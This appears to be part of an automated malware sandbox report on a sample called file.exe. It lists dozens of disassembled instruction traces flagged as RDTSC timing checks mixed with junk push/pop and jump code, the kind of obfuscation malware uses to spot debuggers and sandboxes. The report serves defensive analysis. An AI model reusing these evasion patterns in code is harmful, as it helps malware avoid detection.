              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F38D7 second address: 3F38DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F38DB second address: 3F3905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9047A81D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FE9047A81D0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3905 second address: 3F390B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3A6E second address: 3F3A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3A74 second address: 3F3A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3A78 second address: 3F3A82 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE9047A81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3A82 second address: 3F3A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3A88 second address: 3F3A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE9047A81C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F3D3A second address: 3F3D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F49AA second address: 3F49B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F49B2 second address: 3F49B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F49B7 second address: 3F49C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FE9047A81C6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F87CF second address: 3F87EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FE90543D6C0h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F87EC second address: 3F87FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FE9047A81CAh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3076D5 second address: 3076E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FE90543D6BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8485 second address: 3F8489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8489 second address: 3F84A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F84A6 second address: 3F84BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FE9047A81CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F84BD second address: 3F84C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FABA8 second address: 3FABAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FABAC second address: 3FABB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FABB6 second address: 3FABBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 408733 second address: 408739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 408739 second address: 40873D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40873D second address: 408748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 408748 second address: 408753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 408753 second address: 408757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4162D6 second address: 4162F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4162F2 second address: 416309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE90543D6B6h 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jc 00007FE90543D6B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 416309 second address: 41630F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41630F second address: 416314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42ADAB second address: 42ADB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007FE9047A81C6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B03C second address: 42B040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B35C second address: 42B362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B362 second address: 42B372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FE90543D6B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B372 second address: 42B376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B628 second address: 42B62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42B62E second address: 42B632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42D130 second address: 42D14D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6BEh 0x00000007 jg 00007FE90543D6B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42FABA second address: 42FABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42FC83 second address: 42FC88 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 430061 second address: 4300B0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE9047A81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FE9047A81D5h 0x00000012 push dword ptr [ebp+122D38DEh] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FE9047A81C8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 250C40C1h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4300B0 second address: 4300B6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4318E2 second address: 43190A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FE9047A81CFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43345E second address: 433468 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE90543D6B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50311 second address: 4D50317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50317 second address: 4D50334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE90543D6C9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503C7 second address: 4D50418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9047A81CFh 0x00000009 and ax, 993Eh 0x0000000e jmp 00007FE9047A81D9h 0x00000013 popfd 0x00000014 movzx ecx, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE9047A81D6h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50418 second address: 4D5041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70604 second address: 4D70608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70608 second address: 4D7060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7060E second address: 4D70613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70613 second address: 4D70634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE90543D6C0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, dx 0x00000013 push edi 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70634 second address: 4D70652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70652 second address: 4D7066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7066F second address: 4D706B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 call 00007FE9047A81D3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f pushad 0x00000010 mov edx, 4DF9E474h 0x00000015 popad 0x00000016 mov dword ptr [esp], ecx 0x00000019 jmp 00007FE9047A81D3h 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov dh, 7Ch 0x00000024 mov di, cx 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D706B3 second address: 4D706F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 call 00007FE90543D6C0h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FE90543D6C0h 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FE90543D6C7h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D706F8 second address: 4D706FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D706FE second address: 4D70742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007FE90543D6C7h 0x00000010 nop 0x00000011 jmp 00007FE90543D6C6h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ebx 0x0000001c mov ax, 069Fh 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70742 second address: 4D70798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6D681116h 0x00000008 pushfd 0x00000009 jmp 00007FE9047A81D7h 0x0000000e add ah, FFFFFF9Eh 0x00000011 jmp 00007FE9047A81D9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b pushad 0x0000001c mov bx, si 0x0000001f push eax 0x00000020 mov edx, 3010A10Ah 0x00000025 pop edi 0x00000026 popad 0x00000027 push dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70798 second address: 4D7079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7079C second address: 4D707A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D707A2 second address: 4D707B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE90543D6C1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D708D8 second address: 4D70019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007FE9047A81C7h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007FE9093A44A1h 0x00000032 mov edi, edi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FE9047A81D5h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70019 second address: 4D70073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FE90543D6C2h 0x00000011 push eax 0x00000012 jmp 00007FE90543D6BBh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FE90543D6C4h 0x0000001f sub ecx, 0E193B38h 0x00000025 jmp 00007FE90543D6BBh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ecx, 0B42BF05h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70073 second address: 4D70096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9047A81D6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70096 second address: 4D700A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D700A5 second address: 4D700F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushfd 0x00000006 jmp 00007FE9047A81CBh 0x0000000b xor si, 630Eh 0x00000010 jmp 00007FE9047A81D9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push FFFFFFFEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE9047A81D8h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D700F6 second address: 4D700FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D700FC second address: 4D70130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 48B60D3Dh 0x0000000e pushad 0x0000000f mov dl, C9h 0x00000011 mov ch, 97h 0x00000013 popad 0x00000014 add dword ptr [esp], 2CF4910Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE9047A81CEh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70130 second address: 4D70136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70136 second address: 4D70148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 10620510h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70148 second address: 4D7014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7014D second address: 4D70181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 65C72E60h 0x00000010 jmp 00007FE9047A81CEh 0x00000015 mov eax, dword ptr fs:[00000000h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov esi, edi 0x00000020 push edx 0x00000021 pop ecx 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70181 second address: 4D70226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007FE90543D6BCh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f jmp 00007FE90543D6BEh 0x00000014 mov dword ptr [esp], eax 0x00000017 pushad 0x00000018 jmp 00007FE90543D6BEh 0x0000001d mov esi, 0BC868F1h 0x00000022 popad 0x00000023 sub esp, 18h 0x00000026 jmp 00007FE90543D6BCh 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d call 00007FE90543D6BEh 0x00000032 pop ecx 0x00000033 pushfd 0x00000034 jmp 00007FE90543D6C7h 0x00000039 and si, 96BEh 0x0000003e jmp 00007FE90543D6C9h 0x00000043 popfd 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FE90543D6BDh 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70226 second address: 4D70265 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FE9047A81CCh 0x0000000d and ecx, 1FC51EE8h 0x00000013 jmp 00007FE9047A81CBh 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE9047A81D5h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70265 second address: 4D70275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE90543D6BCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70275 second address: 4D702B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FE9047A81CCh 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007FE9047A81D0h 0x00000016 xchg eax, edi 0x00000017 jmp 00007FE9047A81D0h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D702B5 second address: 4D702B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D702B9 second address: 4D702BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D702BF second address: 4D7036E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov cl, EFh 0x0000000d jmp 00007FE90543D6C1h 0x00000012 popad 0x00000013 mov eax, dword ptr [75AB4538h] 0x00000018 jmp 00007FE90543D6BEh 0x0000001d xor dword ptr [ebp-08h], eax 0x00000020 pushad 0x00000021 mov edi, eax 0x00000023 mov cx, 0199h 0x00000027 popad 0x00000028 xor eax, ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FE90543D6BBh 0x00000031 xor esi, 7EAFB90Eh 0x00000037 jmp 00007FE90543D6C9h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FE90543D6C0h 0x00000043 add esi, 4E870F88h 0x00000049 jmp 00007FE90543D6BBh 0x0000004e popfd 0x0000004f popad 0x00000050 nop 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FE90543D6C0h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7036E second address: 4D70372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70372 second address: 4D70378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70378 second address: 4D7039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9047A81CEh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7039B second address: 4D703A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703A1 second address: 4D703A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
